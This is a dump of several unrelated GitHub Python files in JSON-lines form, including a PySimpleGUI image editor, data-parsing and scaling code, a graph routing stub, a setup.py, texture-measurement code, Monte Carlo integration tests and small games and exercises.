format='png')\n b = output.getvalue()\n base64_img = base64.b64encode(b)\n return base64_img\n # image = PhotoImage(image)\n\nlayout = []\nlayout.append(\n [sg.Text('Ahoj PySimpleGUI', key='welcome_text')]\n)\nlayout.append(\n [sg.Graph(\n canvas_size=(400, 400),\n graph_bottom_left=(0, 0),\n graph_top_right=(400, 400),\n background_color='white',\n enable_events= True,\n drag_submits= True,\n key='graph'\n ),\n sg.Button('RELOAD', key='reload', size=(10, 2), pad=((0, 0), (350, 0))),\n sg.Button('ERASE', tooltip='Cancell this action', size=(10, 2), pad=((5, 0), (350, 0)))\n ]\n)\nlayout.append(\n [sg.InputText('image_path', size=(100, 0), key='path_text_box'),\n sg.FileBrowse('Open Image', file_types=(('Images',('*.jpg', '*.png')),), enable_events=True, key='load_img')\n ]\n)\nlayout.append([sg.OK(f'{x}') for x in range(10)])\n\ntry:\n window = sg.Window(title='AI E-DIT', layout=layout, margins=(100, 50))\n # window.finalize()\n images = []\n # graph = window['graph']\n graph = window.FindElement('graph')\n while True:\n event, values = window.read(timeout=100)\n w_text = window.FindElement('welcome_text')\n w_text.update(f'{time()}')\n # print(event, values)\n if event is not None:\n print(f'Event: {event}\\nValues: {values}')\n if event == sg.WINDOW_CLOSED:\n break\n elif event == 'load_img':\n f_url = values.get('load_img')\n print('here')\n if len(f_url) > 0:\n image = Image.open(f_url)\n image = image.resize((400, 400))\n images= [image]\n base64_img = convert(image)\n graph.draw_image(data=base64_img, location=(0, 400))\n path_text_box = window.FindElement('path_text_box')\n path_text_box.Update(f_url)\n print(path_text_box.Update)\n print('Image loaded')\n elif event == 'reload':\n f_url = values.get('load_img')\n if len(f_url) > 0:\n image = Image.open(f_url)\n image = image.resize((400, 400))\n images = [image]\n base64_img = convert(image)\n graph.draw_image(data=base64_img, location=(0, 400))\n\n elif event == 'ERASE':\n print('KUA')\n graph.Erase()\n elif event == 'graph': #or (event == 'graph+UP'):\n # print(dir(images[0]))\n # print(help(images[0].putpixel))\n x,y = values.get('graph')\n images[0].putpixel((x, -y), (0, 0, 0))\n base64_img = convert(images[0])\n print(dir(graph))\n exit()\n graph.draw_image(data=base64_img, location=(0, 400))\n print('prid')\nexcept Exception as e:\n pass\nfinally:\n window.close()","repo_name":"sliscak/random-ideas","sub_path":"proj10/gui2.py","file_name":"gui2.py","file_ext":"py","file_size_in_byte":3287,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"1436542725","text":"import re\nimport pandas as pd\nfrom dateutil.parser import parse\nfrom sklearn.preprocessing import StandardScaler, MinMaxScaler, RobustScaler, LabelEncoder, OneHotEncoder, OrdinalEncoder\nfrom sklearn.compose import make_column_transformer\n\nclass Parsing ():\n\n def __init__(self,user_input_dict) -> None:\n self.user_input_dict = user_input_dict\n pass\n\n def get_user_input(self):\n\n ''' Get the dictionary from the app with the options from the user. \n Separate the columns that we should keep, the columns to parse by type, \n and the columns that should be scaled.'''\n\n cols_dict = {}\n cols_transf = {}\n cols_type = {}\n \n for name, item in self.user_input_dict.items():\n #Test if the user wants to keep the column.\n if item[0]:\n\n #Separate the colums between diferent scales\n if item[2] not in cols_transf: \n cols_transf[item[2]] = []\n cols_transf[item[2]].append(name)\n\n #Separate the colums between diferent types \n if item[1] not in cols_type:\n cols_type[item[1]] = [] \n cols_type[item[1]].append(name)\n\n #Generate the dictionary with type and scale together\n cols_dict['transform'] = cols_transf\n cols_dict['type'] = cols_type\n cols_dict \n return cols_dict\n\n\n\n def parse_data(self,df):\n '''Parse the columns by type, transform integers, date, \n and integers into actual data type by regex pattern.'''\n\n #Select dictionary type\n user_dict = self.get_user_input()\n user_type_transf = user_dict['type']\n \n #Regex patterns\n int_pattern = re.compile('\\d*')\n float_pattern = re.compile('\\d*[.]\\d*')\n df_error = pd.DataFrame()\n df_parsed = pd.DataFrame()\n\n #Iterate over the types in the dictionary \n\n for key_name in user_type_transf: \n\n #Test if the type is an integer\n if 'int' in key_name:\n for column_name in user_type_transf['int']:\n try:\n int_column = []\n for row in df[column_name].iteritems():\n matches = re.findall(int_pattern, str(row[1]))\n m = \"\".join(matches).strip()\n #If it is an integer, it tries to convert each row on the DataFrame to an actual integer. \n #If it fails, it will attribute 0 to the row.\n try:\n int_column.append(int(m))\n except:\n int_column.append(0)\n df_parsed[column_name] = int_column\n except:\n df_error[column_name] = df[column_name]\n\n #Test if the type is an float\n elif 'float' in key_name:\n try:\n for column_name in user_type_transf['float']:\n float_column = []\n for row in df[column_name].iteritems():\n matches = re.findall(float_pattern, str(row[1]))\n m = \"\".join(matches).strip()\n #If it is an float, it tries to convert each row on the DataFrame to an actual float. \n #If it fails, it will attribute 0 to the row.\n try:\n float_column.append(float(m))\n except:\n float_column.append(0)\n df_parsed[column_name] = float_column\n except:\n df_error[column_name] = df[column_name]\n\n #Test if the type is a date\n elif 'date' in key_name:\n try:\n for column_name in user_type_transf['date']:\n date_column = []\n for row in df[column_name].iteritems():\n str(row[1])\n m = parse(str(row[1]))\n date_column.append(m)\n df_parsed[column_name] = date_column\n except:\n df_error[column_name] = df[column_name]\n #For the other types like text and categorical binary \n # the columns continues the same\n else:\n for column_name in user_type_transf[key_name]:\n date_column = []\n df_parsed[column_name] = df[column_name] \n return df_parsed,df_error\n\n\n def scaler_encoder(self,df):\n user_dict = self.get_user_input()\n user_type_scale = user_dict['transform']\n scaler_list = []\n col_name_list = []\n for scaler, cols in user_type_scale.items():\n if scaler == 'StandardScaler':\n scaler_list.append((StandardScaler(),cols))\n elif scaler == 'MinMaxScaler':\n scaler_list.append((MinMaxScaler(),cols))\n elif scaler == 'RobustScaler':\n scaler_list.append((RobustScaler(),cols))\n elif scaler == 'OneHotEncoder':\n scaler_list.append((OneHotEncoder(handle_unknown='ignore', sparse=False),cols))\n elif scaler == 'OrdinalEncoder':\n scaler_list.append((OrdinalEncoder(),cols))\n\n [col_name_list.extend(col_name[1]) for col_name in scaler_list]\n for col_name in df.columns:\n if col_name not in col_name_list:\n col_name_list.append(col_name)\n print(col_name_list)\n preprocessor = make_column_transformer(*scaler_list, remainder='passthrough')\n preprocessor.fit(df)\n if 'OneHotEncoder' in user_type_scale:\n transf_columns_names = preprocessor.get_feature_names_out()\n transf_names_list = [\n col_name.rpartition('__')[2] for col_name in transf_columns_names]\n df_transformed_pre = preprocessor.transform(df)\n df_transformed = pd.DataFrame(df_transformed_pre, columns=transf_names_list)\n else:\n df_transformed_pre = preprocessor.transform(df)\n df_transformed = pd.DataFrame(df_transformed_pre,columns=col_name_list)\n return df_transformed\n\n def parse_and_transform(self,df):\n df_parsed,df_error = self.parse_data(df)\n print(df_parsed)\n df_trasnf = self.scaler_encoder(df_parsed)\n if df_error.empty:\n return df_trasnf,'Done'\n print(df_error)\n return pd.concat([df_trasnf, df_error], axis=1), f'Parse error in columns {df_error.columns}' \n\nif __name__ == '__main__':\n predictions = {'int_test':(True, 'int','MinMaxScaler'),\n 'date':(True, 'date',None),\n 'int_num':(True, 'int','RobustScaler'),\n 'float_num':(True, 'float','StandardScaler'),\n 'int_num_str':(True, 'int','StandardScaler'),\n 'float_num_str':(True, 'float','MinMaxScaler'),\n 'bin_cat' :(True, 'cat-bin','OrdinalEncoder'),\n 'bin_cat_str' :(True, 'cat-bin','OrdinalEncoder'),\n 'multi_cat_str' :(True, 'text',None),\n }\n int_test=['126 mins', '134 mins', '253_mins', '123,000', '53 seconds']\n date =['12/08/2012', '12 Aug 2022', '12/08/22','20-08-12','12-08-2021']\n int_num =[1,2000,346980,481464,654654]\n float_num =[13654.543,3546645.454,54654654.88,64655432.54654,6544453213.654521]\n int_num_str =['1','2000','b','481464654654','64654']\n float_num_str =['13654.543','asd','54654654.88','64655432.54654','6544453213.654521']\n bin_cat =[True,False,False,True,True]\n bin_cat_str =['Yes','No','No','Yes','Yes']\n multi_cat_str =['gdgd','adsdas','dfsfdfsdf','Ysfdfss','Yesdafbhdfgs']\n\n df = pd.DataFrame({'int_test': int_test,\n 'date': date,\n 'int_num':int_num,\n 'float_num':float_num,\n 'int_num_str': int_num_str,\n 'float_num_str':float_num_str,\n 'bin_cat' : bin_cat,\n 'bin_cat_str' : bin_cat_str,\n 'multi_cat_str':multi_cat_str})\n parse_type = Parsing(predictions)\n print(parse_type.parse_and_transform(df))","repo_name":"eloisahernandez/classipy-webapp","sub_path":"classipyapp/parsing.py","file_name":"parsing.py","file_ext":"py","file_size_in_byte":8499,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"42564969460","text":"from Traversals import bfs_path\nimport heapq\nfrom collections import deque\nfrom Simulator import Simulator\nimport sys\n\nclass Solution:\n\n def __init__(self, problem, isp, graph, info):\n self.problem = problem\n self.isp = isp\n self.graph = graph\n self.info = info\n\n def output_paths(self):\n \"\"\"\n This method must be filled in by you. You may add other methods and subclasses as you see fit,\n but they must remain within the Solution class.\n \"\"\"\n paths, bandwidths, priorities = {}, {}, {}\n\n \n map = []\n bandwidths = self.info[\"bandwidths\"]\n alphas = self.info[\"alphas\"]\n for vertex in self.graph:\n if vertex in bandwidths and vertex in alphas:\n map.append((vertex, bandwidths[vertex], alphas[vertex], self.graph[vertex]))\n\n\n #map is a sorted list of (node, bandwidth of node, alpha)\n #print(map)\n\n distance = {}\n distance[self.isp] = 0\n for i in self.graph:\n distance[i] = 999999999999999999999999999999999\n queue=[]\n queue.append((self.isp,0))\n\n explored= []\n explored.append(self.isp)\n\n sorted_map = sorted(map, key=lambda x: x[1])\n\n while(len(queue)!= 0):\n node, dis = heapq.heappop(queue)\n if(node not in explored):\n explored.append(node)\n \n for next_node, weight, apl, edge_list in map:\n D = distance[node] + weight\n if(D<=apl):\n if (D < distance[next_node]):\n distance[next_node] = D\n heapq.heappush(queue, (next_node, D))\n paths[node]=next_node\n\n\n\n return (paths, bandwidths, priorities)\n","repo_name":"19clehr/cse331_project_take2","sub_path":"Solution.py","file_name":"Solution.py","file_ext":"py","file_size_in_byte":1799,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"73464870322","text":"from setuptools import setup, find_packages\n\n# requerments.txt path\nreq_file = 'requirements.txt'\nwith open(req_file) as f:\n requirements = f.read().splitlines()\n\nreadme_file = 'README.md'\nwith open(readme_file) as f:\n readme = f.read()\n\nchanges_log_file = 'CHANGELOG.md'\nwith open(changes_log_file) as f:\n changes_log = f.read()\n\nrecent_changes_file = 'RECENTCHANGELOG.md'\nwith open(recent_changes_file) as f:\n recent_changes = f.read()\n\nlong_description = readme + '\\n\\n' +\"# RECENT CHANGES\\n\" + recent_changes + '\\n\\n' + changes_log\n\nclassifiers = [\n 'Development Status :: 4 - Beta',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: MIT License',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.6',\n 'Programming Language :: Python :: 3.7',\n 'Programming Language :: Python :: 3.8',\n]\n\nsetup(\n name='wattpad-scraper',\n version='0.0.40',\n description='Get wattpad stories and chapters, and download them as ebook',\n long_description=long_description,\n long_description_content_type='text/markdown',\n url='https://github.com/shhossain/wattpad-scraper',\n author='Shafayat Hossain Shifat',\n author_email='hossain0338@gmail.com',\n license='MIT',\n classifiers=classifiers,\n packages=find_packages(),\n install_requires=requirements,\n)","repo_name":"Ayobamidele/wattpad-scraper","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1388,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"31026176733","text":"from skimage import feature\nimport numpy\nfrom GLCM.pixel_matrix import CoOcurrencyMatrix\nfrom helper_functions import write_text_files\nfrom PCA.pca_interpretation import PCAComponentsInterpretation\n\nclass TextureMeasurements():\n\t\"\"\"\n\tThey are Energy, Entropy, Contrast, Correlation, and Homogeneity. Energy\n\treturns the sum of squared elements in the GLCM and the range will be in\n\t[0, 1]. Entropy measures the randomness of intensity distribution.\n\tCorrelation measure of image linearity, and Homogeneity Returns a value that\n\tmeasures the closeness of the distribution of elements in the GLCM to the GLCM\n\tdiagonal and range will be in [0 1].\n\t\"\"\"\n\tdef save_texture_measurements(self, image_number, image_file_location):\n\t\t\"\"\"\n\t\tFrom the GLCM matrix, create an array with the calculations of the texture\n\t\tmeasurements (contrast, energy, dissimilarity, homogeneity, correlation, asm)\n\t\tand save them in a text file.\n\t\tContrast: Measures the amount of local variation in the image.\n\n\t\tArgs:\n\t\t\timage_number (number): A number that identifies the image to be analyzed\n\t\t\timage_file_location (string): The location where the image is stored\n\n\t\tReturns:\n\t\t\t(string): The location of where the contrast information \n\t\t\t\t\t of the matrix will be saved\n\t\t\"\"\"\n\t\tglcm_percentage_matrix = CoOcurrencyMatrix().relationship_probabilities(image_file_location)\n\n\t\tcontrast = self.extract_texture_measurement(glcm_percentage_matrix, texture='contrast')\n\t\tenergy = self.extract_texture_measurement(glcm_percentage_matrix, texture='energy')\n\t\tdissimilarity = self.extract_texture_measurement(glcm_percentage_matrix, texture='dissimilarity')\n\t\thomogeneity = self.extract_texture_measurement(glcm_percentage_matrix, texture='homogeneity')\n\t\tcorrelation = self.extract_texture_measurement(glcm_percentage_matrix, texture='correlation')\n\t\tasm = self.extract_texture_measurement(glcm_percentage_matrix, texture='ASM')\n\n\t\ttextures = numpy.concatenate((contrast,energy,dissimilarity,homogeneity,correlation,asm),axis=0)\n\t\ttextures = numpy.insert(arr=textures,obj=0,values=image_number)\n\n\t\twrite_text_files(link_to_file=\"GLCM/matrix/textures_mdb{}.txt\".format(image_number), result_data=textures)\n\n\t\treturn \"GLCM/matrix/textures_mdb{}.txt\".format(image_number)\n\n\tdef extract_texture_measurement(self, glcm_percentage_matrix, texture):\n\t\t\"\"\"\n\t\tExtract the texture measurements of the image from the four glcm percentage\n\t\tmatrix vertical and horizontal direction.\n\t\t\n\t\tArgs:\n\t\t\tglcm_percentage_matrix (array): The percentage of the relationship between\n\t\t\t\t\t\t\t\t\t\t\ttwo pixels in the image\n\t\t\ttexture (string): The texture property to be calculated from the GLCM matrix\n\n\t\tReturns:\n\t\t\textracted_texture (array): The texture measurements of the GLCM with\n\t\t\t\t\t\t\t \t\t vertical and horizontal direction.\n\t\t\"\"\"\n\t\textracted_texture = feature.greycoprops(glcm_percentage_matrix, prop=texture).flatten()\n\n\t\treturn extracted_texture\t","repo_name":"khatabi-abderrahim/breast_cancer_detection","sub_path":"GLCM/textures_measurements.py","file_name":"textures_measurements.py","file_ext":"py","file_size_in_byte":2915,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"21620201830","text":"import numpy as np\n\n\ndef function_to_integrate(x, y):\n return np.exp(-x**2 - y**2)\n\n\ndef polar_MC(polar):\n size = 100000\n integral = 0.\n integration_radius = 4.\n if polar:\n for _ in range(size):\n r = np.random.random()*integration_radius\n phi = np.random.random()*2.*np.pi\n x = r*np.cos(phi)\n y = r*np.sin(phi)\n integral += function_to_integrate(x, y) * r\n integral = integral * 2.*np.pi * integration_radius / size\n else:\n for _ in range(size):\n length = 2. * integration_radius\n x = np.random.random()*length - length/2.\n y = np.random.random()*length - length/2.\n integral += function_to_integrate(x, y)\n integral = integral * length**2 / size\n print('POLAR: True integral should be pi ', '; MC:', integral, polar)\n\n\ndef log_MC(log):\n size = 100000\n integral = 0.\n if log:\n for _ in range(size):\n x = np.random.uniform(-2, 7.)\n jacobian_MC_log = (10**x * np.log(10))*9.\n integral += 10**x * jacobian_MC_log\n # x = np.random.uniform(np.log(10**-2), np.log(10**7.))\n # integral += np.e**x\n # (np.log(10**7) - np.log(10**-2))\n integral = integral / size\n\n else:\n for _ in range(size):\n x = np.random.uniform(10**-2, 10**7)\n integral += x\n integral = integral*10**7 / size\n\n print('LOG: True integral should be 0.5*10**7*10**7 = 5*10**13; MC:', integral/10**13, '* 10**13', log)\n\n\ndef both_combined_the_Mareks_way():\n no_of_samples = 100000\n steps_in_integrand_theta = 20\n integral = 0.\n\n shift = 2. * np.pi / steps_in_integrand_theta / 2. # to avoid double counting and y-axis with z and w.\n integrand_angles = np.linspace(-np.pi + shift, np.pi - shift, steps_in_integrand_theta)\n integrand_radii = np.logspace(-5., 1., 20000)\n integrand_cartesian_coods = np.zeros((len(integrand_angles) * len(integrand_radii), 2))\n for radius_ind in range(len(integrand_radii)):\n for theta_ind in range(len(integrand_angles)):\n x_cood = integrand_radii[radius_ind] * np.cos(integrand_angles[theta_ind])\n y_cood = integrand_radii[radius_ind] * np.sin(integrand_angles[theta_ind])\n integrand_cartesian_coods[radius_ind * len(integrand_angles) + theta_ind][0] = x_cood\n integrand_cartesian_coods[radius_ind * len(integrand_angles) + theta_ind][1] = y_cood\n\n random_indexes_z = np.random.randint(0, len(integrand_cartesian_coods), no_of_samples) # z\n array_of_z = integrand_cartesian_coods[random_indexes_z]\n for integration_point in array_of_z:\n x = integration_point[0]\n y = integration_point[1]\n jacobian = np.linalg.norm(integration_point) * np.log(10.) * np.linalg.norm(integration_point) # One r for polar integration and ln(10)*r for log\n integral += function_to_integrate(x, y)*jacobian\n probability_normalization_polar = 2. * np.pi\n probability_normalization_log = np.log10(integrand_radii[-1]) - np.log10(integrand_radii[0])\n print(probability_normalization_log, probability_normalization_polar)\n integral = integral * probability_normalization_polar * probability_normalization_log / no_of_samples\n print('True integral should be pi; MC:', integral)\n\n\ndef both_combined_the_Mareks_way_2D():\n no_of_samples = 1000000\n steps_in_integrand_theta = 20\n integral = 0.\n\n shift = 2. * np.pi / steps_in_integrand_theta / 2. # to avoid double counting and y-axis with z and w.\n integrand_angles = np.linspace(-np.pi + shift, np.pi - shift, steps_in_integrand_theta)\n integrand_radii = np.logspace(-7., 2., 20000)\n integrand_cartesian_coods = np.zeros((len(integrand_angles) * len(integrand_radii), 2))\n for radius_ind in range(len(integrand_radii)):\n for theta_ind in range(len(integrand_angles)):\n x_cood = integrand_radii[radius_ind] * np.cos(integrand_angles[theta_ind])\n y_cood = integrand_radii[radius_ind] * np.sin(integrand_angles[theta_ind])\n integrand_cartesian_coods[radius_ind * len(integrand_angles) + theta_ind][0] = x_cood\n integrand_cartesian_coods[radius_ind * len(integrand_angles) + theta_ind][1] = y_cood\n\n random_indexes_z = np.random.randint(0, len(integrand_cartesian_coods), no_of_samples) # z\n random_indexes_w = np.random.randint(0, len(integrand_cartesian_coods), no_of_samples) # z\n array_of_z = integrand_cartesian_coods[random_indexes_z]\n array_of_w = integrand_cartesian_coods[random_indexes_w]\n # THE FUNCTION IS A UNIT FUNCTION\n function_to_integrate = 1.\n for integration_idx in range(no_of_samples):\n integration_point_z = array_of_z[integration_idx]\n integration_point_w = array_of_w[integration_idx]\n jacobian_z = np.linalg.norm(integration_point_z) * np.log(10.) * np.linalg.norm(integration_point_z) # One r for polar integration and ln(10)*r for log\n jacobian_w = np.linalg.norm(integration_point_w) * np.log(10.) * np.linalg.norm(integration_point_w) # One r for polar integration and ln(10)*r for log\n integral += function_to_integrate*jacobian_z*jacobian_w\n probability_normalization_polar = 2. * np.pi\n probability_normalization_log = np.log10(integrand_radii[-1]) - np.log10(integrand_radii[0])\n probability_normalization = probability_normalization_polar * probability_normalization_log\n\n integral = integral * probability_normalization**2 / no_of_samples\n print('True integral should be pi*10000**2 = 98696; MC:', integral/986960000.)\n\n\n# polar_MC(polar=True)\n# polar_MC(polar=False)\n#\n# log_MC(log=True)\n# log_MC(log=False)\n\n# both_combined_the_Mareks_way()\nboth_combined_the_Mareks_way_2D()\n\n\n\n\n","repo_name":"MatasMarek/NLO_BK","sub_path":"tests/monte_carlo_nonuniform_sampling.py","file_name":"monte_carlo_nonuniform_sampling.py","file_ext":"py","file_size_in_byte":5785,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"72056433206","text":"from collections import deque\n\nm, n = map(int, input().split())\narr = [list(map(int, list(input()))) for _ in range(n)]\nvisited = [[False]*m for _ in range(n)]\ndx, dy = [-1, 0, 1, 0], [0, 1, 0, -1]\n\nq = deque()\nq.append((0, 0, 0))\nvisited[0][0] = True\n\nwhile q:\n x, y, c = q.popleft()\n \n if x == n-1 and y == m-1:\n answer = c\n break\n\n for d in range(4):\n nx, ny = x + dx[d], y + dy[d]\n \n if 0 <= nx < n and 0 <= ny < m and visited[nx][ny] == False:\n visited[nx][ny] = True\n if arr[nx][ny] == 0:\n q.appendleft((nx, ny, c))\n else:\n q.append((nx, ny, c+1))\n \nprint(answer)","repo_name":"Algorithm-Study/Algorithm","sub_path":"graph/B1261_이성우.py","file_name":"B1261_이성우.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"76"} +{"seq_id":"15176599983","text":"# coding: utf8\n# Паника мячей\n# Игрок должен ловить мячи\nfrom livewires import games, color\nimport random\ngames.init(screen_width = 640, screen_height = 480, fps = 50)\n\nclass Pan(games.Sprite):\n\t\"\"\"Перемещение руки\"\"\"\n\timage=games.load_image(\"hands_main.png\")\n\n\tdef __init__(self):\n\t\t\"\"\"Инициализация Рук и отображения счета\"\"\"\n\t\tsuper(Pan, self).__init__(image=Pan.image,\n\t\t\t\t\t\t\t\t\tx=games.mouse.x,\n\t\t\t\t\t\t\t\t\tbottom=games.screen.height)\n\t\tself.score=games.Text(value=0,size=45,color=color.black,\n\t\t\t\t\t\t\t\t\ttop=5, right=games.screen.width-10)\n\t\tgames.screen.add(self.score)\n\n\tdef update(self):\n\t\t\"\"\"Перемещает обьект в по горизонтали\"\"\"\n\t\tself.x=games.mouse.x\n\t\tif self.left<0:\n\t\t\tself.left=0\n\t\tif self.right>games.screen.width:\n\t\t\tself.right=games.screen.width\n\t\tself.check_catch()\n\tdef check_catch(self):\n\t\t\"\"\"Проверка словили ли мяч\"\"\"\n\t\tfor bool in self.overlapping_sprites:\n\t\t\tself.score.value+=10\n\t\t\tself.score.right=games.screen.width-10\n\t\t\tbool.handle_caught()\n\nclass Bool(games.Sprite):\n\t\"\"\"Мячи падающие на землю\"\"\"\n\timage=games.load_image(\"myach2.png\")\n\tspeed=1\n\n\tdef __init__(self, x, y=90):\n\t\t\"\"\"Инициализация обьекта мяч\"\"\"\n\t\tsuper(Bool, self).__init__(image=Bool.image,\n\t\t\t\t\t\t\t\t\tx=x, y=y,\n\t\t\t\t\t\t\t\t\tdy=Bool.speed)\n\tdef update(self):\n\t\t\"\"\"Проверка не коснулась ли границы экрана спрайт\"\"\"\n\t\tif self.bottom >games.screen.height:\n\t\t\tself.end_game()\n\t\t\tself.destroy()\n\n\tdef handle_caught(self):\n\t\t\"\"\"Разрушает обьект пойманным игроком\"\"\"\n\t\tself.destroy()\n\n\tdef end_game(self):\n\t\t\"\"\"Завершение игры\"\"\"\n\t\tend_message=games.Message(value=\"Game Over\",\n\t\t\t\t\t\t\t\t\tsize=90,\n\t\t\t\t\t\t\t\t\tcolor=color.red,\n\t\t\t\t\t\t\t\t\tx=games.screen.width/2,\n\t\t\t\t\t\t\t\t\ty=games.screen.height/2,\n\t\t\t\t\t\t\t\t\tlifetime=5*games.screen.fps,\n\t\t\t\t\t\t\t\t\tafter_death=games.screen.quit)\n\t\tgames.screen.add(end_message)\nclass Hero(games.Sprite):\n\t\"\"\"Герой который бросает мяч\"\"\"\n\timage=games.load_image(\"hero.png\")\n\n\tdef __init__(self, y=55, speed=2, adds_change=200):\n\t\t\"\"\"Инициализация Героя\"\"\"\n\t\tsuper(Hero, self).__init__(image=Hero.image,\n\t\t\t\t\t\t\t\t\tx=games.screen.width/2,\n\t\t\t\t\t\t\t\t\ty=y,\n\t\t\t\t\t\t\t\t\tdx=speed)\n\t\tself.adds_change=adds_change\n\t\tself.time_til_drop=0\n\n\tdef update(self):\n\t\t\"\"\"Определяет надо ли менять направление\"\"\"\n\t\tif self.left<0 or self.right>games.screen.width:\n\t\t\tself.dx=-self.dx\n\t\telif random.randrange(self.adds_change)==0:\n\t\t\tself.dx=-self.dx\n\t\tself.check_drop()\n\n\tdef check_drop(self):\n\t\t\"\"\"Уменьшение интервала ожидания и сбрасывание мяча\"\"\"\n\t\tif self.time_til_drop>0:\n\t\t\tself.time_til_drop -=1\n\t\telse:\n\t\t\tnew_bool=Bool(x=self.x)\n\t\t\tgames.screen.add(new_bool)\n\t\t\tself.time_til_drop=int(new_bool.height*1.3/Bool.speed)+1\n\n\n\n\ndef main():\n\twall_image=games.load_image(\"wall21.jpg\",transparent=False)\n\tgames.screen.background=wall_image\n\n\tthe_hero=Hero()\n\tgames.screen.add(the_hero)\n\n\tthe_pan=Pan()\n\tgames.screen.add(the_pan)\n\n\tgames.mouse.is_visible=False\n\tgames.screen.event_grab=True\n\n\n\tgames.screen.mainloop()\n\n#start\n\nmain()\n","repo_name":"matedim/python","sub_path":"bool_panic.py","file_name":"bool_panic.py","file_ext":"py","file_size_in_byte":3283,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"34637986024","text":"import math\n\n#from Tools.i18n.pygettext import safe_eval\n\nn, m = map(int, input().split())\nmain_lis = []\nlis = []\ncount_lst = []\ncords = []\n\nfor i in range(n):\n lis = [list(i) for i in input().split()]\n main_lis.append(lis[0])\n#print(main_lis)\n\n\ndef check(i, j, incr=1,count=0):\n try:\n if i - incr < 0 or j-incr < 0 or main_lis[i-incr][j] == 'X' or main_lis[i][j+incr] == 'X' or main_lis[i+incr][j] == 'X' or main_lis[i][j-incr] == 'X':\n raise IndexError\n else:\n #print('indide')\n if main_lis[i-incr][j] == 'G' and main_lis[i][j+incr] == 'G' and main_lis[i+incr][j] == 'G' and main_lis[i][j-incr] == 'G':\n #print('insode')\n count += 4\n incr += 1\n check(i, j, incr,count)\n except IndexError as e:\n if count != 0:\n count_lst.append(count)\n temp = [i, j]\n cords.append(temp)\n\ndef first_time():\n for i in range(n):\n for j in range(m):\n if i == 0 or i == n-1 or j==0 or j==m-1:\n pass\n else:\n if main_lis[i][j] == 'G':\n print('found at ', i, j)\n check(i,j)\n\n\n\n\ndef marked(i, j, incr=1, count=0):\n global main_lis\n try:\n if i - incr < 0 or j-incr < 0 :\n raise IndexError\n else:\n print('in marking')\n if main_lis[i-incr][j] == 'G' and main_lis[i][j+incr] == 'G' and main_lis[i+incr][j] == 'G' and main_lis[i][j-incr] == 'G':\n main_lis[i][j] = 'X'\n main_lis[i - incr][j] = 'X'\n main_lis[i][j + incr] = 'X'\n main_lis[i + incr][j] = 'X'\n main_lis[i][j - incr] = 'X'\n print('marked ',i,j)\n count += 1\n incr += 1\n marked(i, j, incr,count)\n except IndexError as e:\n print('marked list is',main_lis)\n\n\nfirst_time()\nprint(count_lst)\nprint(cords)\n\n#copy = main_lis.copy()\ncopy = [i for i in main_lis]\nprint('mai list ais',copy)\n#copyCount = count_lst.copy()\ncopyCount = [i for i in count_lst]\n#copyCords = cords.copy()\ncopyCords = [i for i in cords]\nsecondLs= []\n\n'''\nprint(count_lst)\nprint(cords)\nprint(len(count_lst))\nprint(len(cords))\nprint(max(count_lst))\nmax_cords = cords[count_lst.index(max(count_lst))]\nprint(max_cords)\nfirst = max(count_lst)+1\nprint('first value is {}'.format(first))\n'''\n\nprint(copyCords)\nfor p in copyCords:\n print(p[0],p[1])\n marked(p[0],p[1])\n print('main list is',main_lis)\n print('copy list is',copy)\n #main_lis = copy.copy()\n main_lis = [i for i in copy]\n #print(main_lis)\n\nprint('secondlists are')\nprint(secondLs)\n\n'''\nmarked(max_cords[0], max_cords[1])\n\nprint(main_lis)\n\ncount_lst.clear()\ncords.clear()\n\nfirst_time()\nprint('lst is')\nprint(count_lst)\nprint(cords)\nprint(len(cords))\nif len(count_lst) == 0:\n second = 1\nelse:\n second = max(count_lst)+1\nprint('second value is {}'.format(second))\n\n\nprint('final val is {}'.format(first*second))\n'''\n","repo_name":"ardnahcivar/Python","sub_path":"Learning python/ema_supercomp.py","file_name":"ema_supercomp.py","file_ext":"py","file_size_in_byte":3070,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"3122960150","text":"from bank import CheckingAccount\n\nid_1 = CheckingAccount(\"Jane\", \"Doe\")\n\ndef main():\n is_running = True\n while is_running == True:\n menu = input(\"Hello {} {}. Pick one of the following: (1) Make a deposit. (2) Withdraw money. (3) Check balance. (4) View Transactions. (5) Quit. \".format(id_1.first_name,id_1.last_name))\n print(menu)\n\n if menu == '1':\n deposit_amount = int(input(\"Enter the amount you would like to deposit: \"))\n print(\"You have deposited ${}.\".format(deposit_amount))\n id_1.deposit_money(deposit_amount)\n\n elif menu == '2':\n withdrawal_amount = int(input(\"Enter the amount you would like to withdraw: \"))\n print(\"You withdrew ${}.\".format(withdrawal_amount))\n id_1.make_withdrawal(withdrawal_amount)\n\n\n elif menu == '3':\n print(\"Your balance is ${}.\".format(id_1.get_balance()))\n\n elif menu == '4':\n print(id_1.get_transaction_history())\n\n elif menu == '5':\n is_running = False\n print(\"Goodbye {} {}. Your total deposits for this session were ${} and your total withdrawals for this session were ${}. The final balance in your account is ${}.\".format(id_1.first_name, id_1.last_name, id_1.deposit_total, id_1.withdrawal_total, id_1.balance))\n break\n\nmain()\n","repo_name":"ashleystieb/CodeGuildPDX","sub_path":"python/labs/bankaccount/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1350,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"33981087951","text":"# !/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\n# num = int(input())\n# cont = 0\n# aux = num\n# resto = []\n# while aux > 0:\n# dig = aux % 